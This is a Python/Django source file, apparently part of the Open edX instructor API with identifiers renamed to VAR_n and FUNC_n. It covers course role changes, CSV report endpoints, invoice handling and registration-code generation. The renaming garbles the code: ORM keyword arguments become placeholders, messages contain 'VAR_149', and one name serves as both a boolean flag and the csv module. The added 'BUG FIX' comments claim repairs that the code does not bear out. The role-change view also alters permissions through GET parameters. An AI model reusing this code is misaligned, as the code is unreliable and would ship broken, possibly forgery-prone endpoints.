    VAR_64 = VAR_9.GET.get('rolename')
    VAR_57 = VAR_9.GET.get('action')
    if VAR_64 not in ROLES:
        VAR_169 = strip_tags("unknown VAR_64 '{}'".format(VAR_64))
        VAR_0.error(VAR_169)
        return HttpResponseBadRequest(VAR_169)
    # An instructor may not remove their own instructor role.
    if VAR_64 == 'instructor' and VAR_19 == VAR_9.user and VAR_57 != 'allow':
        VAR_63 = {
            'unique_student_identifier': VAR_19.username,
            'rolename': VAR_64,
            'action': VAR_57,
            'removingSelfAsInstructor': True,
        }
        return JsonResponse(VAR_63)
    if VAR_57 == 'allow':
        allow_access(VAR_65, VAR_19, VAR_64)
    elif VAR_57 == 'revoke':
        revoke_access(VAR_65, VAR_19, VAR_64)
    else:
        return HttpResponseBadRequest(strip_tags(
            "unrecognized VAR_57 '{}'".format(VAR_57)
        ))
    VAR_63 = {
        'unique_student_identifier': VAR_19.username,
        'rolename': VAR_64,
        'action': VAR_57,
        'success': 'yes',
    }
    return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_1(VAR_64="'instructor', 'staff', or 'beta'")
def FUNC_16(VAR_9, VAR_10):
    """
    List users holding the requested course role ('rolename' GET param).

    Returns JSON: {'course_id': ..., <rolename>: [user-info dicts]}.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'instructor', VAR_10, depth=None
    )
    VAR_64 = VAR_9.GET.get('rolename')
    if VAR_64 not in ROLES:
        return HttpResponseBadRequest()

    def FUNC_85(VAR_19):
        """Minimal serializable view of a user record."""
        return {
            'username': VAR_19.username,
            'email': VAR_19.email,
            'first_name': VAR_19.first_name,
            'last_name': VAR_19.last_name,
        }

    VAR_63 = {
        'course_id': VAR_10.to_deprecated_string(),
        # FIX: list comprehension instead of map() so the value is a real,
        # JSON-serializable list under Python 3 as well as Python 2.
        VAR_64: [FUNC_85(VAR_19) for VAR_19 in list_with_level(VAR_65, VAR_64)],
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_17(VAR_9, VAR_10):
    """
    Start the problem-responses CSV report for the problem named by the
    'problem_location' GET parameter; respond with a status message.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_66 = VAR_9.GET.get('problem_location', '')
    try:
        VAR_170 = UsageKey.from_string(VAR_66)
        VAR_171 = VAR_170.run
        if not VAR_171:
            # Old-style location string: re-parse relative to the course key.
            VAR_170 = VAR_38.make_usage_key_from_deprecated_string(VAR_66)
        if VAR_170.course_key != VAR_38:
            # BUG FIX: the raise referenced the undefined name `problem_key`;
            # report the offending location string instead.
            raise InvalidKeyError(type(VAR_170), VAR_66)
    except InvalidKeyError:
        return JsonResponseBadRequest(_("Could not find problem with this location."))
    try:
        instructor_task.api.submit_calculate_problem_responses_csv(VAR_9, VAR_38, VAR_66)
        VAR_172 = _(
            "The problem responses report is being VAR_149."
            " To view the status of the report, see Pending Tasks below."
        )
        return JsonResponse({"status": VAR_172})
    except AlreadyRunningError:
        VAR_196 = _(
            "A problem responses report generation VAR_150 is already in progress. "
            "Check the 'Pending Tasks' table for the status of the VAR_150. "
            "When completed, the report will be available for download in the table below."
        )
        return JsonResponse({"status": VAR_196})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_18(VAR_9, VAR_10):
    """
    Return the course grading configuration summary as JSON.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'staff', VAR_10, depth=None
    )
    return JsonResponse({
        'course_id': VAR_10.to_deprecated_string(),
        'grading_config_summary': instructor_analytics.basic.dump_grading_context(VAR_65),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_19(VAR_9, VAR_10, VAR_26=False):  # pylint: disable=unused-argument, redefined-outer-VAR_16
    """
    Report e-commerce sale (invoice) records for the course: JSON by default,
    or a CSV download when VAR_26 is truthy.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_68 = [
        'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
        'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
        'internal_reference', 'invoice_number', 'codes', 'course_id'
    ]
    VAR_69 = instructor_analytics.basic.sale_record_features(VAR_10, VAR_68)
    if VAR_26:
        VAR_86, VAR_73 = instructor_analytics.csvs.format_dictlist(VAR_69, VAR_68)
        return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", VAR_86, VAR_73)
    # JSON response: flatten the creator to a plain username first.
    for VAR_197 in VAR_69:
        VAR_197['created_by'] = VAR_197['created_by'].username
    return JsonResponse({
        'course_id': VAR_10.to_deprecated_string(),
        'sale': VAR_69,
        'queried_features': VAR_68
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_20(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """
    Download e-commerce sale order records for the course as a CSV
    attachment.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # (internal field name, human-readable CSV column header) pairs.
    VAR_68 = [
        ('id', 'Order Id'),
        ('company_name', 'Company Name'),
        ('company_contact_name', 'Company Contact Name'),
        ('company_contact_email', 'Company Contact Email'),
        ('logged_in_username', 'Login Username'),
        ('logged_in_email', 'Login User Email'),
        ('purchase_time', 'Date of Sale'),
        ('customer_reference_number', 'Customer Reference Number'),
        ('recipient_name', 'Recipient Name'),
        ('recipient_email', 'Recipient Email'),
        ('bill_to_street1', 'Street 1'),
        ('bill_to_street2', 'Street 2'),
        ('bill_to_city', 'City'),
        ('bill_to_state', 'State'),
        ('bill_to_postalcode', 'Postal Code'),
        ('bill_to_country', 'Country'),
        ('order_type', 'Order Type'),
        ('status', 'Order Item Status'),
        ('coupon_code', 'Coupon Code'),
        ('list_price', 'List Price'),
        ('unit_cost', 'Unit Price'),
        ('quantity', 'Quantity'),
        ('total_discount', 'Total Discount'),
        ('total_amount', 'Total Amount Paid'),
    ]
    VAR_70 = [x[0] for x in VAR_68]  # queried feature keys
    VAR_71 = [x[1] for x in VAR_68]  # CSV header row
    VAR_69 = instructor_analytics.basic.sale_order_record_features(VAR_10, VAR_70)
    VAR_72, VAR_73 = instructor_analytics.csvs.format_dictlist(VAR_69, VAR_70)
    return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", VAR_71, VAR_73)
@FUNC_3('staff')
@require_POST
def FUNC_21(VAR_9, VAR_10):
    """
    Invalidate or re-activate a course invoice.

    POST params: 'invoice_number' (integer) and 'event_type' ('invalidate'
    invalidates; any other value re-activates).
    """
    try:
        VAR_173 = VAR_9.POST["invoice_number"]
    except KeyError:
        return HttpResponseBadRequest("Missing required VAR_173 parameter")
    try:
        VAR_173 = int(VAR_173)
    except ValueError:
        return HttpResponseBadRequest(
            "invoice_number must be an integer, {value} provided".format(
                value=VAR_173
            )
        )
    try:
        VAR_174 = VAR_9.POST["event_type"]
    except KeyError:
        return HttpResponseBadRequest("Missing required VAR_174 parameter")
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        # BUG FIX: the course filter value referenced the undefined name
        # `course_id`; use the parsed course key.
        VAR_27 = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
            invoice_id=VAR_173,
            VAR_10=VAR_10
        )
        VAR_27 = VAR_27.invoice
    except CourseRegistrationCodeInvoiceItem.DoesNotExist:  # Check for old type invoices
        return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=VAR_173))
    if VAR_174 == "invalidate":
        return FUNC_22(VAR_27)
    else:
        return FUNC_23(VAR_27)
def FUNC_22(VAR_27):
    """
    Mark the invoice invalid; 400 if it was already invalidated.
    """
    if not VAR_27.is_valid:
        return HttpResponseBadRequest(_("The sale associated with this VAR_29 has already been invalidated."))
    VAR_27.is_valid = False
    VAR_27.save()
    return JsonResponse({'message': _('Invoice number {0} has been invalidated.').format(VAR_27.id)})
def FUNC_23(VAR_27):
    """
    Re-activate a previously invalidated invoice; 400 if already active.
    """
    if VAR_27.is_valid:
        return HttpResponseBadRequest(_("This VAR_29 is already active."))
    VAR_27.is_valid = True
    VAR_27.save()
    return JsonResponse({'message': _('The registration codes for VAR_29 {0} have been re-activated.').format(VAR_27.id)})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_24(VAR_9, VAR_10):
    """
    Report issued certificate counts per course mode: JSON by default, or a
    CSV download when the 'csv' GET parameter equals 'true'.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_75 = VAR_9.GET.get('csv', 'false')
    VAR_68 = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
    # (feature key, localized column header) pairs.
    VAR_76 = [
        ('course_id', _('CourseID')),
        ('mode', _('Certificate Type')),
        ('total_issued_certificate', _('Total Certificates Issued')),
        ('report_run_date', _('Date Report Run'))
    ]
    VAR_77 = instructor_analytics.basic.issued_certificates(VAR_38, VAR_68)
    if VAR_75.lower() == 'true':
        VAR_72, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_77, VAR_68)
        return instructor_analytics.csvs.create_csv_response(
            'issued_certificates.csv',
            [col_header for VAR_72, col_header in VAR_76],
            VAR_81
        )
    else:
        VAR_63 = {
            'certificates': VAR_77,
            'queried_features': VAR_68,
            'feature_names': dict(VAR_76)
        }
        return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_25(VAR_9, VAR_10, VAR_26=False):  # pylint: disable=redefined-outer-VAR_16
    """
    Report profile information for enrolled students: JSON by default, or
    start the background CSV report when VAR_26 is truthy.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_65 = get_course_by_id(VAR_38)
    VAR_78 = instructor_analytics.basic.AVAILABLE_FEATURES
    # Microsites may override the set of profile fields to report.
    VAR_68 = list(microsite.get_value('student_profile_download_fields', []))
    if not VAR_68:
        # BUG FIX: the fallback list was assigned to the undefined/unused
        # name `query_features`, leaving the feature set empty.
        VAR_68 = [
            'id', 'username', 'name', 'email', 'language', 'location',
            'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
            'goals',
        ]
    VAR_76 = {
        'id': _('User ID'),
        'username': _('Username'),
        'name': _('Name'),
        'email': _('Email'),
        'language': _('Language'),
        'location': _('Location'),
        'year_of_birth': _('Birth Year'),
        'gender': _('Gender'),
        'level_of_education': _('Level of Education'),
        'mailing_address': _('Mailing Address'),
        'goals': _('Goals'),
    }
    if is_course_cohorted(VAR_65.id):
        # Translators: 'Cohort' refers to the group a student belongs to.
        VAR_68.append('cohort')
        VAR_76['cohort'] = _('Cohort')
    if VAR_65.teams_enabled:
        VAR_68.append('team')
        VAR_76['team'] = _('Team')
    VAR_68.append('city')
    VAR_76['city'] = _('City')
    VAR_68.append('country')
    VAR_76['country'] = _('Country')
    if not VAR_26:
        VAR_175 = instructor_analytics.basic.enrolled_students_features(VAR_38, VAR_68)
        VAR_63 = {
            'course_id': unicode(VAR_38),
            'students': VAR_175,
            'students_count': len(VAR_175),
            'queried_features': VAR_68,
            'feature_names': VAR_76,
            'available_features': VAR_78,
        }
        return JsonResponse(VAR_63)
    else:
        try:
            instructor_task.api.submit_calculate_students_features_csv(VAR_9, VAR_38, VAR_68)
            VAR_172 = _("The enrolled learner VAR_54 report is being VAR_149."
                        " To view the status of the report, see Pending Tasks below.")
            return JsonResponse({"status": VAR_172})
        except AlreadyRunningError:
            VAR_196 = _(
                "This enrollment report is currently being VAR_149."
                " To view the status of the report, see Pending Tasks below."
                " You will be able to download the report when it is complete.")
            return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_26(VAR_9, VAR_10):
    """
    Start the background CSV report of learners who may enroll but have not
    yet done so; respond with a status message.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_68 = ['email']
    try:
        instructor_task.api.submit_calculate_may_enroll_csv(VAR_9, VAR_38, VAR_68)
    except AlreadyRunningError:
        return JsonResponse({"status": _(
            "This enrollment report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )})
    return JsonResponse({"status": _(
        "The enrollment report is being VAR_149. This report contains"
        " information about learners who can enroll in the VAR_65."
        " To view the status of the report, see Pending Tasks below."
    )})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@FUNC_3('staff')
def FUNC_27(VAR_9, VAR_10):
    """
    Accept an uploaded CSV mapping users to cohorts, validate its header,
    store it, and start the background cohort-assignment task.
    """
    VAR_38 = SlashSeparatedCourseKey.from_string(VAR_10)
    try:
        def FUNC_88(VAR_176, VAR_177):
            """
            Verify the uploaded file has a 'cohort' column and at least one
            of 'username'/'email'; raise FileValidationException otherwise.
            """
            with VAR_176.open(VAR_177) as f:
                VAR_207 = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
                try:
                    VAR_210 = next(VAR_207)
                except StopIteration:
                    VAR_210 = []
                VAR_180 = None
                if "cohort" not in VAR_210:
                    VAR_180 = _("The file must contain a 'cohort' column containing cohort names.")
                elif "email" not in VAR_210 and "username" not in VAR_210:
                    VAR_180 = _("The file must contain a 'username' column, an 'email' column, or both.")
                if VAR_180:
                    raise FileValidationException(VAR_180)
        # BUG FIX: the validator keyword value referenced the undefined name
        # `validator`; pass the local FUNC_88 defined above.
        VAR_72, VAR_123 = store_uploaded_file(
            VAR_9, 'uploaded-file', ['.csv'],
            course_and_time_based_filename_generator(VAR_38, "cohorts"),
            max_file_size=2000000,  # limit to 2 MB
            FUNC_88=FUNC_88
        )
        instructor_task.api.submit_cohort_students(VAR_9, VAR_38, VAR_123)
    except (FileValidationException, PermissionDenied) as err:
        return JsonResponse({"error": unicode(err)}, status=400)
    return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_28(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """
    Download all coupon codes for the course as a CSV attachment.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # BUG FIX: the coupon filter value referenced the undefined name
    # `course_id`; use the parsed course key.
    VAR_79 = Coupon.objects.filter(VAR_10=VAR_10)
    # (internal field name, localized CSV column header) pairs.
    VAR_68 = [
        ('code', _('Coupon Code')),
        ('course_id', _('Course Id')),
        ('percentage_discount', _('% Discount')),
        ('description', _('Description')),
        ('expiration_date', _('Expiration Date')),
        ('is_active', _('Is Active')),
        ('code_redeemed_count', _('Code Redeemed Count')),
        ('total_discounted_seats', _('Total Discounted Seats')),
        ('total_discounted_amount', _('Total Discounted Amount')),
    ]
    VAR_70 = [x[0] for x in VAR_68]
    VAR_71 = [x[1] for x in VAR_68]
    VAR_80 = instructor_analytics.basic.coupon_codes_features(VAR_70, VAR_79, VAR_10)
    VAR_72, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_80, VAR_70)
    return instructor_analytics.csvs.create_csv_response('Coupons.csv', VAR_71, VAR_81)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_6
def FUNC_29(VAR_9, VAR_10):
    """
    Start the detailed enrollment report task and report its status.
    """
    VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_detailed_enrollment_features_csv(VAR_9, VAR_38)
    except AlreadyRunningError:
        return JsonResponse({
            "status": _("The detailed enrollment report is being VAR_149."
                        " To view the status of the report, see Pending Tasks below."
                        " You will be able to download the report when it is complete.")
        })
    return JsonResponse({
        "status": _("The detailed enrollment report is being VAR_149."
                    " To view the status of the report, see Pending Tasks below.")
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_6
def FUNC_30(VAR_9, VAR_10):
    """
    Start the executive summary report task and report its status.
    """
    VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_executive_summary_report(VAR_9, VAR_38)
        VAR_186 = _("The executive summary report is being VAR_149."
                    " To view the status of the report, see Pending Tasks below.")
    except AlreadyRunningError:
        VAR_186 = _(
            "The executive summary report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    return JsonResponse({
        "status": VAR_186
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_31(VAR_9, VAR_10):
    """
    Submit the asynchronous course-survey report task and return its status
    as JSON; reports differently when the task is already running.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_course_survey_report(VAR_9, course_key)
        status_message = _(
            "The survey report is being VAR_149."
            " To view the status of the report, see Pending Tasks below."
        )
    except AlreadyRunningError:
        status_message = _(
            "The survey report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    return JsonResponse({
        "status": status_message
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_32(VAR_9, VAR_10):
    """
    Submit the proctored-exam results report task (with a fixed feature
    list) and return its status as JSON.
    """
    # Columns requested from the results report.
    report_features = [
        'user_email',
        'exam_name',
        'attempt_code',
        'allowed_time_limit_mins',
        'is_sample_attempt',
        'started_at',
        'completed_at',
        'status',
    ]
    course_key = CourseKey.from_string(VAR_10)
    try:
        instructor_task.api.submit_proctored_exam_results_report(VAR_9, course_key, report_features)
        status_message = _(
            "The proctored exam VAR_51 report is being VAR_149."
            " To view the status of the report, see Pending Tasks below."
        )
    except AlreadyRunningError:
        status_message = _(
            "The proctored exam VAR_51 report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    return JsonResponse({
        "status": status_message
    })
def FUNC_33(VAR_19, VAR_10, VAR_28, VAR_29=None, VAR_30=None, VAR_31=None):
    """
    Create and save a CourseRegistrationCode with a freshly generated code.

    Retries recursively when the generated code collides with an existing
    active coupon code, or when saving loses a uniqueness race
    (IntegrityError).

    VAR_19: creating user; VAR_10: course key; VAR_28: mode slug;
    VAR_29 / VAR_30 / VAR_31: optional invoice / order / invoice item.
    """
    VAR_82 = FUNC_35()
    # Fixed NameError: the filter value referenced undefined `code`;
    # compare against the newly generated code instead.
    VAR_83 = Coupon.objects.filter(VAR_82=VAR_82, is_active=True)
    if VAR_83:
        # Collision with an active coupon code: try again with a new code.
        return FUNC_33(
            VAR_19, VAR_10, VAR_28, VAR_29=VAR_29, VAR_30=VAR_30, VAR_31=VAR_31
        )
    VAR_84 = CourseRegistrationCode(
        VAR_82=VAR_82,
        VAR_10=unicode(VAR_10),
        created_by=VAR_19,
        # Fixed NameError: values referenced undefined `invoice`, `order`,
        # `mode_slug`, `invoice_item`; use this function's parameters.
        VAR_29=VAR_29,
        VAR_30=VAR_30,
        VAR_28=VAR_28,
        VAR_31=VAR_31
    )
    try:
        with transaction.atomic():
            VAR_84.save()
        return VAR_84
    except IntegrityError:
        return FUNC_33(
            VAR_19, VAR_10, VAR_28, VAR_29=VAR_29, VAR_30=VAR_30, VAR_31=VAR_31
        )
def FUNC_34(VAR_32, VAR_33, VAR_34=None):
    """
    Build a CSV HTTP response named VAR_32 describing the registration
    codes in VAR_33; VAR_34 is an optional mode flag passed through to the
    analytics helper.
    """
    feature_names = [
        'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
        'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
    ]
    code_rows = instructor_analytics.basic.course_registration_features(feature_names, VAR_33, VAR_34)
    header_row, data_rows = instructor_analytics.csvs.format_dictlist(code_rows, feature_names)
    return instructor_analytics.csvs.create_csv_response(VAR_32, header_row, data_rows)
def FUNC_35():
    """Generate a random registration code of settings-configured length (default 8)."""
    code_length = getattr(settings, 'REGISTRATION_CODE_LENGTH', 8)
    return FUNC_8(code_length)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_36(VAR_9, VAR_10):
    """
    Download the course's registration codes as 'Registration_Codes.csv',
    optionally narrowed to the POSTed company name.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # Fixed NameError: the filter value referenced undefined `course_id`.
    VAR_85 = CourseRegistrationCode.objects.filter(
        VAR_10=VAR_10
    ).order_by('invoice_item__invoice__company_name')
    VAR_88 = VAR_9.POST['download_company_name']
    if VAR_88:
        # Fixed NameError: `registration_codes` was undefined; narrow the
        # queryset built above instead.
        VAR_85 = VAR_85.filter(invoice_item__invoice__company_name=VAR_88)
    VAR_34 = 'download'
    return FUNC_34("Registration_Codes.csv", VAR_85, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_5
@require_POST
def FUNC_37(VAR_9, VAR_10):
    """
    Create an invoice plus the requested number of course registration
    codes, email them (CSV + invoice attachments) to the recipient(s), and
    respond with 'Registration_Codes.csv'.

    Fixes in this revision: numerous keyword-argument values referenced
    undefined names (rename artifacts) and raised NameError at runtime;
    each now references the local read from the POST data. The ORM keyword
    names themselves are left untouched — presumably they map onto the
    models' field names; verify against the model definitions.
    """
    VAR_10 = CourseKey.from_string(VAR_10)
    VAR_89 = False
    try:
        VAR_179 = int(VAR_9.POST['total_registration_codes'])
    except ValueError:
        # Tolerate a float-looking count such as "5.0".
        VAR_179 = int(float(VAR_9.POST['total_registration_codes']))
    VAR_88 = VAR_9.POST['company_name']
    VAR_90 = VAR_9.POST['company_contact_name']
    VAR_91 = VAR_9.POST['company_contact_email']
    VAR_92 = VAR_9.POST['unit_price']
    try:
        # Normalize the unit price to two decimal places, rounding down.
        VAR_92 = (
            decimal.Decimal(VAR_92)
        ).quantize(
            decimal.Decimal('.01'),
            rounding=decimal.ROUND_DOWN
        )
    except decimal.InvalidOperation:
        return HttpResponse(
            status=400,
            content=_(u"Could not parse amount as a decimal")
        )
    VAR_93 = VAR_9.POST['recipient_name']
    VAR_94 = VAR_9.POST['recipient_email']
    VAR_95 = VAR_9.POST['address_line_1']
    VAR_96 = VAR_9.POST['address_line_2']
    VAR_97 = VAR_9.POST['address_line_3']
    VAR_98 = VAR_9.POST['city']
    VAR_99 = VAR_9.POST['state']
    VAR_100 = VAR_9.POST['zip']
    VAR_17 = VAR_9.POST['country']
    VAR_101 = VAR_9.POST['internal_reference']
    VAR_102 = VAR_9.POST['customer_reference_number']
    VAR_103 = [VAR_94]
    if VAR_9.POST.get('invoice', False):
        # The requester asked for an invoice copy: also email them.
        VAR_103.append(VAR_9.user.email)
        VAR_89 = True
    VAR_104 = VAR_92 * VAR_179
    set_user_preference(VAR_9.user, INVOICE_KEY, VAR_89)
    # Fixed NameError throughout this call: values referenced the
    # pre-rename identifiers (e.g. `company_name`) instead of the locals.
    VAR_105 = Invoice.objects.create(
        total_amount=VAR_104,
        VAR_88=VAR_88,
        VAR_91=VAR_91,
        VAR_90=VAR_90,
        VAR_10=VAR_10,
        VAR_93=VAR_93,
        VAR_94=VAR_94,
        VAR_95=VAR_95,
        VAR_96=VAR_96,
        VAR_97=VAR_97,
        VAR_98=VAR_98,
        VAR_99=VAR_99,
        zip=VAR_100,
        VAR_17=VAR_17,
        VAR_101=VAR_101,
        VAR_102=VAR_102
    )
    VAR_31 = CourseRegistrationCodeInvoiceItem.objects.create(
        VAR_29=VAR_105,
        qty=VAR_179,
        VAR_92=VAR_92,  # fixed: was undefined `unit_price`
        VAR_10=VAR_10  # fixed: was undefined `course_id`
    )
    VAR_65 = get_course_by_id(VAR_10, depth=0)
    VAR_106 = CourseMode.paid_modes_for_course(VAR_10)
    if len(VAR_106) != 1:
        VAR_180 = (
            u"Generating Code Redeem Codes for Course '{VAR_10}', which must have a single paid VAR_65 VAR_20. "
            u"This is a configuration issue. Current VAR_65 modes with payment options: {VAR_106}"
        ).format(VAR_10=VAR_10, VAR_106=VAR_106)  # fixed: values were undefined `course_id` / `paid_modes`
        VAR_0.error(VAR_180)
        return HttpResponse(
            status=500,
            content=_(u"Unable to generate redeem codes because of VAR_65 misconfiguration.")
        )
    VAR_24 = VAR_106[0]
    VAR_107 = VAR_24.min_price
    VAR_85 = []
    for VAR_72 in range(VAR_179):
        VAR_181 = FUNC_33(
            VAR_9.user, VAR_10, VAR_24.slug, VAR_29=VAR_105, VAR_30=None, VAR_31=VAR_31  # fixed: was undefined `invoice_item`
        )
        VAR_85.append(VAR_181)
    VAR_108 = microsite.get_value('SITE_NAME', 'localhost')
    VAR_109 = VAR_179
    VAR_110 = (float(VAR_109 * VAR_107) - float(VAR_104))
    VAR_111 = '{base_url}{course_about}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        course_about=reverse('about_course', VAR_3={'course_id': VAR_10.to_deprecated_string()})
    )
    VAR_112 = '{base_url}{dashboard}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        dashboard=reverse('dashboard')
    )
    try:
        VAR_182 = VAR_105.generate_pdf_invoice(VAR_65, VAR_107, int(VAR_109), float(VAR_104))
    except Exception:  # pylint: disable=broad-except
        # Best-effort: fall back to a plain-text notice if PDF creation fails.
        VAR_0.exception('Exception at creating pdf file.')
        VAR_182 = None
    VAR_113 = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
    VAR_114 = {
        'invoice': VAR_105,
        'site_name': VAR_108,
        'course': VAR_65,
        'course_price': VAR_107,
        'sub_total': VAR_107 * VAR_109,
        'discount': VAR_110,
        'sale_price': VAR_104,
        'quantity': VAR_109,
        'registration_codes': VAR_85,
        'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
        'course_url': VAR_111,
        'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
        'dashboard_url': VAR_112,
        'contact_email': VAR_113,
        'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
        'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
        'date': time.strftime("%m/%d/%Y")
    }
    VAR_115 = u'Confirmation and Invoice for {course_name}'.format(course_name=VAR_65.display_name)
    VAR_74 = render_to_string('emails/registration_codes_sale_email.txt', VAR_114)
    VAR_116 = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', VAR_114)
    VAR_117 = StringIO.StringIO()
    VAR_118 = VAR_26.writer(VAR_117)
    for registration_code in VAR_85:
        # NOTE(review): redeem links are built with a hard-coded http://
        # scheme — confirm whether https should be used.
        VAR_183 = 'http://{base_url}{redeem_code_url}'.format(
            base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
            redeem_code_url=reverse('register_code_redemption', VAR_3={'registration_code': registration_code.code})
        )
        VAR_118.writerow([registration_code.code, VAR_183])
    VAR_119 = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
    if VAR_119:
        # Fixed NameError: was `recipient_list.append(...)`; the recipient
        # list local is VAR_103.
        VAR_103.append(VAR_119)
    for recipient in VAR_103:
        VAR_14 = EmailMessage()
        VAR_14.subject = VAR_115
        VAR_14.body = VAR_74
        VAR_14.from_email = VAR_113
        VAR_14.to = [recipient]
        VAR_14.attach(u'RegistrationCodes.csv', VAR_117.getvalue(), 'text/csv')
        VAR_14.attach(u'Invoice.txt', VAR_116, 'text/plain')
        if VAR_182 is not None:
            VAR_14.attach(u'Invoice.pdf', VAR_182.getvalue(), 'application/pdf')
        else:
            VAR_198 = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
            VAR_14.attach(u'pdf_unavailable.txt', VAR_198.getvalue(), 'text/plain')
        VAR_14.send()
    return FUNC_34("Registration_Codes.csv", VAR_85)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_38(VAR_9, VAR_10):
    """
    Download the not-yet-redeemed ('active') registration codes as CSV,
    optionally narrowed to the POSTed company name.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # Fixed NameError: the filter value referenced undefined `course_id`.
    VAR_120 = CourseRegistrationCode.objects.filter(
        VAR_10=VAR_10
    ).order_by('invoice_item__invoice__company_name')
    VAR_88 = VAR_9.POST['active_company_name']
    if VAR_88:
        # Fixed NameError: `registration_codes_list` was undefined.
        VAR_120 = VAR_120.filter(invoice_item__invoice__company_name=VAR_88)
    VAR_121 = RegistrationCodeRedemption.objects.select_related(
        'registration_code', 'registration_code__invoice_item__invoice'
    ).filter(registration_code__course_id=VAR_10)
    if VAR_121.exists():
        VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
        # Fixed NameError: `registration_codes_list` was undefined; exclude
        # the redeemed codes from the queryset built above.
        VAR_120 = VAR_120.exclude(code__in=VAR_184)
